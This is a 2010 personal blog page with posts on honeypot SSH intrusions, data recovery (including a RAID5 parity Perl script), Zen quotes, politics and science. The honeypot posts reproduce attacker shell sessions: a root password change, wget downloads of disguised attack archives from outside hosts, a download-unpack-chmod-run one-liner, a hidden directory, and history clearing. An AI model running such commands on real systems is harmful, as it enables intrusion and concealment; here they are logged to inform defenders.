Thursday, October 28, 2010

Romanian BlackHat Script Kid at Work

Honeypot session capture of a successful ssh compromise by what looks like a script kiddie. The session did not last long enough to determine the attacker's skill level or abilities though.

sales:~# w
18:02:29 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 81.180.208.214 18:02 0.00s 0.00s 0.00s w
sales:~# ps x
PID TTY TIME CMD
5673 pts/0 00:00:00 bash
5677 pts/0 00:00:00 ps x
sales:~# uname -a
Linux sales 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux
sales:~# cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 2
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4270.03
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 1
cpu cores : 2
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4266.61
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

sales:~# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
sales:~# adduser test
Adding user `test' ...
Adding new group `test' (1001) ...
Adding new user `test' (1001) with group `test' ...
Creating home directory `/home/test' ...
Copying files from `/etc/skel' ...
Password:
Password again:

Changing the user information for test
Enter the new value, or press ENTER for the default
Username []: cd
^C
sales:~# Full Name []: cd
sales:~# cd /tmp
sales:/tmp# ls
sales:/tmp# cd /var/tmp
sales:/var/tmp# ls
sales:/var/tmp# cd
sales:~# ls
sales:~# cd /var/tmp
sales:/var/tmp# wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
sales:/var/tmp# wget gambit.altervista.org/gb.jpg
--2010-10-26 18:04:06-- http://gambit.altervista.org/gb.jpg
Connecting to gambit.altervista.org:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3943354 (3M) [image/jpeg]
Saving to: `gb.jpg

100%[======================================>] 3,943,354 155K/s eta 0s

2010-10-26 18:04:31 (155 KB/s) - `gb.jpg' saved [3943354/3943354]
sales:/var/tmp# tar zxvf gb.jpg
gb
gb/58
gb/12
gb/61
gb/39
gb/60
gb/vuln.txt
gb/57
gb/14
gb/49
gb/38
gb/13
gb/ssh
gb/9
gb/51
gb/15
gb/pscan.c
gb/16
gb/41
gb/30
gb/3
gb/1
gb/54
gb/56
gb/21
gb/34
gb/pscan2
gb/skan
gb/55
gb/59
gb/ps
gb/28
gb/17
gb/31
gb/36
gb/7
gb/52
gb/29
gb/33
gb/common
gb/32
gb/x
gb/62
gb/26
gb/5
gb/23
gb/37
gb/22
gb/10
gb/6
gb/44
gb/50
gb/43
gb/47
gb/2
gb/screen
gb/11
gb/go.sh
gb/48
gb/25
gb/gen-pass.sh
gb/pass_file
gb/45
gb/19
gb/35
gb/18
gb/ss
gb/42
gb/46
gb/20
gb/24
gb/r00t
gb/8
gb/pico
gb/53
gb/4
gb/27
gb/40
sales:/var/tmp# cd gb
sales:/var/tmp/gb# chmod +x *
sales:/var/tmp/gb# ./x 41.243
___
{o,o}
|)__)
-"-"-
O RLY? ^C
sales:/var/tmp/gb# cd
sales:~# cd /var/tmp
sales:/var/tmp# ls
gb.jpg gb
sales:/var/tmp# rm -rf gb
sales:/var/tmp# rm -rf gb.jpg
sales:/var/tmp# wget http://bido.hi2.ro/signed.tgz ; tar xzvf signed.tgz ; rm -rf signed.tgz ; cd ._ ; chmod +x * ; export PATH="." ; sh
--2010-10-26 18:05:17-- http://bido.hi2.ro/signed.tgz
Connecting to bido.hi2.ro:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 891356 (870K) [application/x-gzip]
Saving to: `signed.tgz

100%[======================================>] 891,356 51K/s/s eta 0s

2010-10-26 18:05:35 (51 KB/s) - `signed.tgz' saved [891356/891356]
._
._/configure
._/1.user
._/m.lev
._/m.set
._/checkmech
._/r
._/r/raway.e
._/r/rnicks.e
._/r/rversions.e
._/r/rtsay.e
._/r/rsignoff.e
._/r/rpickup.e
._/r/rsay.e
._/r/rkicks.e
._/r/rinsult.e
._/LinkEvents
._/src
._/src/gencmd.c
._/src/vars.c
._/src/vars.o
._/src/function.c
._/src/global.h
._/src/channel.c
._/src/gencmd
._/src/socket.c
._/src/defines.h
._/src/main.c
._/src/xmech.c
._/src/config.h.in
._/src/dcc.c
._/src/cfgfile.o
._/src/trivia.o
._/src/usage.h
._/src/socket.o
._/src/com-ons.c
._/src/parse.c
._/src/commands.o
._/src/combot.o
._/src/Makefile.in
._/src/parse.o
._/src/text.h
._/src/debug.c
._/src/Makefile
._/src/trivia.c
._/src/commands.c
._/src/structs.h
._/src/link.o
._/src/channel.o
._/src/h.h
._/src/cfgfile.c
._/src/dcc.o
._/src/config.h
._/src/userlist.c
._/src/main.o
._/src/xmech.o
._/src/com-ons.o
._/src/mcmd.h
._/src/link.c
._/src/function.o
._/src/combot.c
._/src/userlist.o
._/src/debug.o
._/Makefile
._/sh
._/pico
._/m.h
._/m.pid
._/bsd
._/2.user
sales:/var/tmp/._# cd
sales:~#
sales:~#
sales:~# cd
sales:~# w
18:05:41 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 81.180.208.214 18:02 0.00s 0.00s 0.00s w
sales:~# ls
sales:~# history -c

The archive file gb.jpg looks like a port scanner (pscan2) and an ssh brute-force program like unixcod. You can even see him or her test it using similar syntax to unixcod. Most of the files are dictionary files containing username/password combinations. It would probably be a good idea to install breakingguard or denyhosts on your ssh enabled Linux/Unix/MacOSX system. The archive file, signed.tgz, is the Energymech IRC bot.

Labels:


Wednesday, October 27, 2010

The Buddha

The Buddha is a good show. I bought the DVD and watched it. Two computers wouldn't play it though. Had to watch it on my laptop. DRM on a movie about one of the great spiritual masters that prevents the owner from playing it. What to make of that. This segment is as sad as the Crucifixion of Jesus as depicted in several movies.

Labels:


Enlightenment Versus Intellect

If you memorize slogans,
you are unable to make
subtle adaptations according
to the situation.
It is not that there is no
way to teach insight to learners,
but once you have learned a way,
it is essential that you get
it to work completely.
If you just stick to your
teacher's school and memorize slogans,
his is not enlightenment,
it is a part of intellectual knowledge.

- Fayan

Labels:


BoingBoing Torture Euphemism Generator



Original link is here if the iframe is too slow. Where's George Carlin when we need him? This reminds me of Caputo's A Rumor of War. Read pages 166-167 to see how the U.S. Army describes what happens to someone who steps on a mine made from a 155mm artillery shell, what the military calls an IED today. (Yes, they had IEDs in Vietnam.) I suppose an optimist would say we are making progress when many of our veterans only come home maimed and brain-damaged instead of in little tiny fragments.

The MSM supported the government during the Vietnam War and they support the government now. When the MSM quits supporting the wars overseas, then the government will look for the exits. But the MSM only quits after it is obvious that the Army is losing and the people have already decided that the war was folly and waste to begin with.

I believe that the latest fad in national defense policy circles to to pull out Vietnam analyses and substitute the words Afghanistan and Taliban for North Vietnam and Viet Cong/NVA. The North Vietnamese knew they could outlast us. Even if we won every battle, they still won the war making our role in Vietnam pointless. The Taliban have the same incentive. They can lose every battle and still win the war. Our only way to victory is to uplift Afghan society such that the Taliban and their agenda become meaningless. That won't happen because the focus isn't to win through rebuilding the society, but to destroy an enemy that operates like a ghost in the night. Our military trains people to kill the "enemy" and the emphasis is on destruction of the enemy and the enemy's society which we already occupy. Using the military for nation building only happened once after World War II when we rebuilt Germany and Japan after both countries had thoroughly been destroyed. WWII was the exception, not the rule. Every successful American conflict has been one of subjugation followed by colonization or, the equivalent, building military bases in those countries.

If we were serious about winning and rebuilding Afghanistan, we'd have sent 10,000 extra troops into the country instead of 30,000 extra troops. They'd have been combat engineers who could have built roads. The money saved from not sending the other 20,000 troops (roughly $20,000,000,000 or more) could have been given to the Afghans through NGOs to build schools and infrastructure and improve their quality of living through their own hard work and labor. Instead we piss lives and money away chasing ghosts, supporting a corrupt government, and using the latest hardware when we know that good old B-52s, A-10s, donkeys, Chinooks, and M-14s work better in country than B-1s, B-2s, humvees, MRAPS, F-22s, and M-4s. Vietnam Part II. Nothing seems to change with current American military doctrine except the terminology used to describe it.

Labels:


Monday, October 25, 2010

Searching for Extraterrestrial Life

SETI will likely not succeed. The interval when a civilization uses radio waves is quite small compared to the life span of a civilization. It is far more likely that exoplanet hunters will find an advanced civilization before SETI does. Think about it. With the recent paper on planetary orbital engineering where planets are moved into favorable orbits, what would the implications be to any exoplanet astronomer? If I saw two or more planets in the same or very close orbits within the habitable region of a solar system, I'd know that chances are they didn't get there by themselves. It would be very cool if Kepler or a Kepler like mission actually found a solar system where the planets have been moved by intelligent beings. Such a system would last a very long time provided the orbital solutions were properly calculated.

Labels:


A Lunar Desert Isn't That Wet

I'm not sure what to make of these results. I am not a planetary scientist, but there was no blatant traces of water when the Centaur stage impacted on the Moon. Some of this water is likely non-existent, just hydrogen ions trapped in the lunar regolith. The news reports have been hyping that the Moon is a lot wetter than we thought. It is highly likely that the Moon is a drier desert than any desert on Earth. It is quite probable that the earthly deserts look like rain forests compared to the aridity of the Moon.

Perhaps in 100-250 years if the scientific pace keeps up, we'll be able to terraform our Moon and make it a green and blue ball in our sky. A silver Moon will be a memory of the past. Arthur C. Clarke wrote a story featuring a Russian scientist who was accidentally killed by a plant he created that could live and thrive on the Moon. Can you imagine lunar redwoods that dwarf the redwoods in the Pacific Northwest? We'd have to import a lot of icy comets from the Oort Cloud, but likely, the water we need is there.

Labels:


Sunday, October 24, 2010

Why Medical Research (and Economics Research) is Wrong?

There is an Atlantic article entitled, "Lies, Damn Lies, and Medical Science". It's about the finding of a small group of researchers led by Dr. John Ioannidis who are showing how flawed the academic biomedical research establishment's findings are. This is not a bad thing. Science only progresses through self examination, self reflection, and checking assumptions. Any field of science or academic research will have a percentage of incorrect results being published. The question is, what is that percentage? The "harder" the science, the lower the percentage of bad or flawed publications. The softer the science or the more perverse the incentives to succeed, the more publications will be bad, flawed, or fraudulent. The following is from a comment I posted on NakedCapitalism.

The Atlantic article appears to support Sturgeon’s Revelation that 90% of everything humans produce is crud. I once had a discussion with my thesis advisor about scientific results due to a scientific misconduct case occurring in the early 1990’s. His belief was that in that particular Nobel Prize winner’s lab, that the pressure to produce was so great that at least 30% of results emanating from that lab were either flawed or fabricated. The problem is that if caught fabricating evidence, the researcher’s career is effectively over. In biomedical research, it is easier to fabricate evidence in obscure fields or areas where one’s results are not likely to be checked. The more prestigious the result, the less likely false or misleading evidence will go unnoticed because others will try to reproduce the results and fail. This is how cheaters are caught.

Even then, some studies are flawed due to environmental factors. Scientists who work with mice found out that different treatment results from the same treatment with different mouse strains could be minimized if they limited food intake shortly before the study began. Different mouse strains giving different results for the same treatment go back 70 years or more. Recently, they discovered that having mice in different cages affected study results.

With medical papers, it’s more difficult to catch frauds. Add in the uncertainty of mice studies and multiply the effect with humans. Every person is unique in genotype and phenotype. We are not at all like inbred mouse strains. Add in insufficient statistical sample sizes, bad statistical analysis, sloppy methodology, environmental and psychological effects, and it’s difficult to tell if the author is incompetent or a fraud. Generally, with frauds, the results are too good to be true, and the methodology is sound, but the results are unreproducible. But, the poor quality of clinical medical articles seems to have been a given for some time.

What the Atlantic article didn’t discuss is the difference in publications between researchers in fields with dedicated funding such as Germany versus America. German researchers generally don’t have to worry about publishing to obtain funding. Their funding is dedicated, so the publish or perish linkage is broken. Therefore, there is less pressure to be “right” or prove others wrong for career or professional advancement. Since the US publishes a great deal more research than any other nation or even group of nations, the results will be skewed by our publish or perish system. It would be informative to know who is getting correct results rather than who is getting it wrong for prestige or profit. Until the incentives are fixed and proper methodologies followed, nothing will change in medicine, economics, or any other field of human endeavor.

Labels:


Saturday, October 23, 2010

Surgical File Recovery using the MFT and File Based Imaging

This is a rather new technology demoed by Scott A. Moulton utilizing the $MFT and $Bitmap files and a special machine:

Outerz0ne 6 - Hard Drive Kung Fu Magic 1
Outerz0ne 6 - Hard Drive Kung Fu Magic 2
Outerz0ne 6 - Hard Drive Kung Fu Magic 3
Outerz0ne 6 - Hard Drive Kung Fu Magic 4
Outerz0ne 6 - Hard Drive Kung Fu Magic 5

Labels:


SSD Data Recovery and Forensics and the Lack Thereof

Scott Moulton has posted two talks on Solid State Disk drives and data recovery/forensics.

Solid State Drives will Ruin Forensics:

Solid State Drives will Ruin Forensics Part 1/5

Solid State Drives will Ruin Forensics Part 2/5
Solid State Drives will Ruin Forensics Part 3/5

Solid State Drives will Ruin Forensics Part 4/5
Solid State Drives will Ruin Forensics Part 5/5

SSD Flash Hard Drives - Shmoocon 2008:

SSD Flash Hard Drives - Shmoocon 2008 - 1/6
SSD Flash Hard Drives - Shmoocon 2008 - 2/6
SSD Flash Hard Drives - Shmoocon 2008 - 3/6
SSD Flash Hard Drives - Shmoocon 2008 - 4/6
SSD Flash Hard Drives - Shmoocon 2008 - 5/6
SSD Flash Hard Drives - Shmoocon 2008 - 6/6

Labels:


Scott Moulton on RAID

I am posting more of Scott Moulton's presentations to make it easier for people to find the relevant information. None of this information is mine, and I make no claims to it. It is highly unusual for a person such as Scott to teach such useful knowledge in such a tight lipped field as data recovery and digital forensics.

Dynamic Disk Array Data Recovery (Windows LDM)

RAID Data Recovery Presentation:
RAID Reassembly by Sight and Sound Part 1/6
RAID Reassembly by Sight and Sound Part 2/6
RAID Reassembly by Sight and Sound Part 3/6
RAID Reassembly by Sight and Sound Part 4/6
RAID Reassembly by Sight and Sound Part 5/6
RAID Reassembly by Sight and Sound Part 6/6

His Defcon17 RAID speech (pdf).
FreeSoftwareMagazine article and source code.
R-Tools Technology RAID Presentation.
RAID 5 perl script:

#!/usr/bin/perl -w

#
# raid5 perl utility
# Copyright (C) 2005 Mike Hardy <[EMAIL PROTECTED]>
#
# This script understands the default linux raid5 disk layout,
# and can be used to check parity in an array stripe, or to calculate
# the data that should be present in a chunk with a read error.
#
# Constructive criticism, detailed bug reports, patches, etc gladly accepted!
#
# Thanks to Ashford Computer Consulting Service for their handy RAID
information:
# http://www.accs.com/p_and_p/RAID/index.html
#
# Thanks also to the various linux kernel hackers that have worked on 'md',
# the header files and source code were quite informative when writing this.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# You should have received a copy of the GNU General Public License
# (for example /usr/src/linux/COPYING); if not, write to the Free
# Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#

my @array_components = (
"/dev/loop0",
"/dev/loop1",
"/dev/loop2",
"/dev/loop3",
"/dev/loop4",
"/dev/loop5",
"/dev/loop6",
"/dev/loop7"
);

my $chunk_size = 64 * 1024; # chunk size is 64K
my $sectors_per_chunk = $chunk_size / 512;


# Problem - I have a bad sector on one disk in an array
my %component = (
"sector" => 2032,
"device" => "/dev/loop3"
);


# 1) Get the array-related info for that sector
# 2) See if it was the parity disk or not
# 2a) If it was the parity disk, calculate the parity
# 2b) If it was not the parity disk, calculate its value from parity
# 3) Write the data back into the sector

(
$component{"array_chunk"},
$component{"chunk_offset"},
$component{"stripe"},
$component{"parity_device"}
) = &getInfoForComponentAddress($component{"sector"}, $component{"device"});

foreach my $KEY (keys(%component)) {
print $KEY . " => " . $component{$KEY} . "\n";
}

# We started with the information on the bad sector, and now we know how it
fits into the array
# Lets see if we can fix the bad sector with the information at hand

# Build up the list of devices to xor in order to derive our value
my $xor_count = -1;
for (my $i = 0; $i <= $#array_components; $i++) {

# skip ourselves as we roll through
next if ($component{"device"} eq $array_components[$i]);

# skip the parity chunk as we roll through
next if ($component{"parity_device"} eq $array_components[$i]);

$xor_devices{++$xor_count} = $array_components[$i];

print
"Adding xor device " .
$array_components[$i] . " as xor device " .
$xor_count . "\n";
}

# If we are not the parity device, put the parity device at the end
if (!($component{"device"} eq $component{"parity_device"})) {

$xor_devices{++$xor_count} = $component{"parity_device"};

print
"Adding parity device " .
$component{"parity_device"} . " as xor device " .
$xor_count . "\n";
}


# pre-calculate the device offset, and initialize the xor buffer
my $device_offset = $component{"stripe"} * $sectors_per_chunk;
my $xor_result = "0" x ($sectors_per_chunk * 512);

# Read in the chunks and feed them into the xor buffer
for (my $i = 0; $i <= $xor_count; $i++) {

print
"Reading in chunk on stripe " .
$component{"stripe"} . " (sectors " .
$device_offset . " - " .
($device_offset + $sectors_per_chunk) . ") of device " .
$xor_devices{$i} . "\n";

# Open the device and read this chunk in
open(DEVICE, "<" . $xor_devices{$i})
|| die "Unable to open device " . $xor_devices{$i} . ": " . $! . "\n";
seek(DEVICE, $device_offset, 0)
|| die "Unable to seek to " . $device_offset . " device " .
$xor_devices{$i} . ": " . $! . "\n";
read(DEVICE, $data, ($sectors_per_chunk * 512))
|| die "Unable to read device " . $xor_devices{$1} . ": " . $! . "\n";
close(DEVICE);

# Convert binary to hex for printing
my $hexdata = unpack("H*", pack ("B*", $data));
#print "Got data '" . $hexdata . "' from device " . $xor_devices{$i} . "\n";

# xor the data in there
$xor_result ^= $data;
}

my $hex_xor_result = unpack("H*", pack ("B*", $xor_result));
#print "got hex xor result '" . $hex_xor_result . "'\n";

#########################################################################################
# Testing only -
# Check to see if the result I got is the same as what is in the block
open (DEVICE, "<" . $component{"device"})
|| die "Unable to open device " . $compoent{"device"} . ": " . $! . "\n";
seek(DEVICE, $device_offset, 0)
|| die "Unable to seek to " . $device_offset . " device " .
$xor_devices{$i} . ": " . $! . "\n";
read(DEVICE, $data, ($sectors_per_chunk * 512))
|| die "Unable to read device " . $xor_devices{$1} . ": " . $! . "\n";
close(DEVICE);

# Convert binary to hex for printing
my $hexdata = unpack("H*", pack ("B*", $data));
#print "Got data '" . $hexdata . "' from device " . $component{"device"} . "\n";


# Do the comparison, and report what we've got
if (!($hexdata eq $hex_xor_result)) {
print "The value from the device, and the computed value from parity are
inequal for some reason...\n";
}
else {
print "Device value matches what we computed from other devices. Score!\n";
}
#########################################################################################



# Given an array component, and a sector address in that component, we want
# 1) the disk/sector combination for the start of its stripe
# 2) the disk/sector combination for the start of its parity
sub getInfoForComponentAddress() {

# Get our arguments into (hopefully) well-named variables
my $sector = shift();
my $device = shift();

print "determining info for sector "
. $sector . " on "
. $device . "\n";

# Get the stripe number
my $stripe = int($sector / $sectors_per_chunk);
print "stripe number is " . $stripe . "\n";

# Get the offset in the stripe
my $chunk_offset = $sector % $sectors_per_chunk;
print "chunk offset is " . $chunk_offset . "\n";

# See what device index our device is
my $device_index = 0;
for ($i = 0; $i <= $#array_components; $i++) {
if ($device eq $array_components[$i]) {
$device_index = $i;
print "This disk is device " . $device_index . " in the array\n";
}
}

# Figure out which disk holds parity for this stripe
# FIXME only handling the default left-asymmetric style right now
my $parity_device_index = ($#array_components) - ($stripe %
$array_components);
print "parity device index for stripe " . $stripe . " is " .
$parity_device_index . "\n";
my $parity_device = $array_components[$parity_device_index];

# Figure out which chunk of the array this is
# FIXME only handling the default left-asymmetric style right now
my $array_chunk = $stripe * ($array_components - 1) + $device_index;
if ($device_index > $parity_device_index) {
$array_chunk--;
}

# Check for the special case where this device *is* the parity device and
return special
if ($device_index == $parity_device_index) {
$array_chunk = -1;
}

return (
$array_chunk,
$chunk_offset,
$stripe,
$parity_device
);
}

Labels:


Thursday, October 21, 2010

Hard Drive Data Recovery Splained by Scott Moulton

Scott Moulton of myharddrivedied.com teaches hard drive data recovery and forensics. Here are a series of talks about hard drives. The first talk is a top ten useful hard drive trivia talk. The DIY talk is very informative and tells you what software is the most useful for data recovery, and what you can and can't fix if you lose a drive.

Ten Cool Things You Did Not Know About Your Hard Drive.

DIY Hard Drive Diagnostics Presentation. (7/7)

Other presentations are here. His youtubechannel is here. The Defcon 14 talk isn't as informative as the DIY Hard Drive Diagnostics presentation, but it is still valuable.

Some tips:

Software:
MHDD, Victoria, ddrescue, NTFS Explorer, Secure Erase
Overwriting the data on the drive one time will ensure that any sensitive date is gone forever. There is no need to overwrite the disk multiple times, but Secure Erase is a much faster and safer way to destroy sensitive data.

Hardware:
After 2006, chances are you will have a firmware or board problem. WD drives with triangular integrated electronics boards can not be fixed simply by replacing the boards. A ROM chip (U12) has to be moved from the old board onto the replacement board. Also, never open a WD drive without some research. The way the hard drives are manufactured, if the case is opened, chances are that you will misalign the platters and then you are screwed because there's no way to realign the platters to recover the data. The drive may be repaired, but the data is lost. Here's a video presentation by another data recovery firm, ACSData.

The outer edge of the drive is the fastest part of the hard drive. Your first partition goes there. Many operating systems partition the drive such that the places where you want the greatest performance are at the worst location, closer to the spindle. Basically, you want the swap partition to be the last partition and the database partition to be the first partition. Ubuntu's default install partitions the drive very suboptimally. My Debian (apttosid) laptop is partitioned properly, but my Ubuntu KVM server/workstation isn't. :-\ I'm glad that I at least had clue enough to use ddrescue for data recovery issues in the past.

Backup, backup, backup! SCSI drives are superior to ATA drives. Today's ATA drives are so cheaply made that their failure rate has gone through the roof. That said, 70% of drive failures are recoverable via software such as a Knoppix live CD with ddrescue and testdisk. 10% of the remaining failures are the IDE PCB which in some cases can be replaced easily (see onepcbsolution.com). So, 80% of the time, hard drives' data can be recovered without opening the hard drive. USB flash memory and other forms of flash memory are the discards from Cisco and other NAND flash memory manufacturers/users. Also, flash memory will fail after 10 years without periodic recharging. SSD drives can not be easily recovered since you would have to desolder and move the chips from one board to another. Yikes!

Labels:


Tuesday, October 19, 2010

Bad Headlines

Happy Days's Tom Bosley Dead at first glance registered as "Happy Days, Tom Bosley Dead at 83" just glancing at Google News. Couldn't they have worded it a bit better?

More than one tool for the Fed at first glance on the Calculated Risk blog seemed to read "More than one fool for the Fed".

The latter one probably offers a glimpse into my twisted little mind.

Labels:


Snooping Kit Phone Creeper v0.95 Released for Windows Mobiles

One reason not to own a Windows mobile phone.

Labels:


Monday, October 18, 2010

Just Say No to Plagiarism!

Plagiarism is just plain wrong! Copyright protections were developed to protect writers and their livelihoods. Stealing someone else's article in whole or in part is a form of theft. A while back, Peter Coates at Australia by the Indian Ocean had a blog posting plagiarized. Now, Gonzalo Lira had a recent post plagiarized by Cumberland Advisors. It doesn't matter whether the theft was large or small, it's wrong and unethical! I'm not condemning someone for lifting a sentence and using that in their blog or email. I am admonishing people for lifting whole paragraphs if not whole articles. It's not that difficult to give an attribution to the author or source when you reference someone else's writing and credit should be given where credit is due. We are not China yet! If you want to plagiarize, move to China where copyrights mean little.

Labels:


Friday, October 15, 2010

This World is as Tenuous as a Dream

The world is unstable, like a house on fire. This is not a place where you stay long. The murderous haunt of impermanence comes upon you in a flash, no matter whether you are rich or poor, old or young. If you want to be no different from a Zen master or a buddha, just do not seek outwardly.

- Lin Chi (d 867)


"The natural selection of phenotypes cannot in itself produce cumulative change, because phenotypes are extremely temporary manifestations...Socrates...may have been very successful in the evolutionary sense of leaving numerous offspring. His phenotype, nevertheless, was utterly destroyed by the hemlock and has never since been duplicated...The same argument also holds for genotypes. With Socrates' death, not only did his phenotype disappear but also his genotype...because meiosis and recombination destroy genotypes as surely as death...It is only the meiotically dissociated fragments of the genotype that are transmitted in sexual reproduction, and these fragments are further fragmented by meiosis in the next generation. If there is an ultimate indivisible fragment it is, by definition, ‘the gene’ that is treated in the abstract discussions of population genetics."

George C. Williams (1926-2010)

Labels:


Tuesday, October 12, 2010

Barry Ritholtz Interview on The Keiser Report

video

Barry Ritholtz's blog, The Big Picture, is an informative blog from the perspective of a Wall Street money manager. The whole show is here.

Labels:


Saturday, October 09, 2010

More Information on Sipvicous Attacks

I have more information on the sipvicious attacks. A monitored system was successfully attacked today. Unfortunately, the connection was lost. Something caused the WAN interface on my DSL router to fail. The attacker had a Romanian IP address, 89.42.192.73, which is likely a dynamically assigned IP address because a reverse lookup gives 73.192.42.89.in-addr.arpa domain name pointer 73-192-42-89.uen.ro.

The breach occurred around timestamp 2010-10-09 19:11:43 in my logs.

Here's a replay of the actions of the attacker:

sales:~# w
19:11:47 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 89.42.192.73 19:11 0.00s 0.00s 0.00s w
sales:~# uname -a
Linux sales 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux
sales:~# cat /etc/issue
Debian GNU/Linux 5.0 \n \l

sales:~# cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 2
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4270.03
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 1
cpu cores : 2
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4266.61
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

sales:~# cd /var/tmp/
sales:/var/tmp# ls
sales:/var/tmp# yum -y install gcc sendmail screen
bash: yum: command not found
sales:/var/tmp# apt-get install gcc sendmail screen
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
gcc screen sendmail
0 upgraded, 3 newly installed, 0 to remove and 259 not upgraded.
Need to get 1302.2kB of archives.
After this operation, 2864.4kB of additional disk space will be used.
Get:1 http://ftp.debian.org stable/main gcc 1.10-5 [352.2kB]
Get:2 http://ftp.debian.org stable/main screen 0.23-5 [179.2kB]
Get:3 http://ftp.debian.org stable/main sendmail 0.11-1 [771.2kB]
Fetched 1302.2kB in 1s (4493B/s)
Reading package fields... Done
Reading package status... Done
(Reading database ... 177887 files and directories currently installed.)
Unpacking gcc (from .../archives/gcc_1.10-5_i386.deb) ...
Unpacking screen (from .../archives/screen_0.23-5_i386.deb) ...
Unpacking sendmail (from .../archives/sendmail_0.11-1_i386.deb) ...
Processing triggers for man-db ...
Setting up gcc (1.10-5) ...
Setting up screen (0.23-5) ...
Setting up sendmail (0.11-1) ...
sales:/var/tmp# mkdir :">..
sales:/var/tmp# mkdir "..."
sales:/var/tmp# cd "..."
sales:/var/tmp/...# wget http://wed2010.ucoz.com/sip.tgz
--2010-10-09 19:16:19-- http://wed2010.ucoz.com/sip.tgz
Connecting to wed2010.ucoz.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 388072 (378K) [application/octet-stream]
Saving to: `sip.tgz

100%[======================================>] 388,072 255K/s eta 0s

2010-10-09 19:16:20 (255 KB/s) - `sip.tgz' saved [388072/388072]
sales:/var/tmp/...# tar zxvf s
tar: s: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
sales:/var/tmp/...# locatre
sales:/var/tmp/...# locate sip.conf
bash: locate: command not found
sales:/var/tmp/...# apt-get install locate
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
locate
0 upgraded, 1 newly installed, 0 to remove and 259 not upgraded.
Need to get 542.2kB of archives.
After this operation, 1192.4kB of additional disk space will be used.
Get:1 http://ftp.debian.org stable/main locate 1.37-9 [542.2kB]
Fetched 542.2kB in 1s (4493B/s)
Reading package fields... Done
Reading package status... Done
(Reading database ... 177887 files and directories currently installed.)
Unpacking locate (from .../archives/locate_1.37-9_i386.deb) ...
Processing triggers for man-db ...
Setting up locate (1.37-9) ...
sales:/var/tmp/...# locate sip.conf
locate: Segmentation fault
sales:/var/tmp/...# ls
sip.tgz
sales:/var/tmp/...# tar zxvf sip.tgz
sip
sip/useri
sip/totag
sip/TODO
sip/THANKS
sip/svwar.py
sip/svreport.py
sip/svmap.py
sip/svlearnfp.py
sip/svcrack.py
sip/sv.xsl
sip/staticheaders
sip/staticfull
sip/regen.pyc
sip/regen.py
sip/README
sip/pptable.pyc
